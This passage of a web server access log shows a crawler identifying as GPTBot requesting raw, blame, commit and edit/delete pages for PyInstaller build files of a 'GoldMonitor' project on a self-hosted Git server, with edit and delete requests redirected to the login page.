+0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:26:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:26:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:26:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:26:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:26:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:26:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:26:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:26:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:26:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:26:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:26:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:26:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:26:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:26:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:18:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101529] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 100203] [Gzip 29.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100298] [Gzip 29.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 101146] [Gzip 29.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99976] [Gzip 29.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99916] [Gzip 29.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:27:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:27:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:27:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:18:27:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:27:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 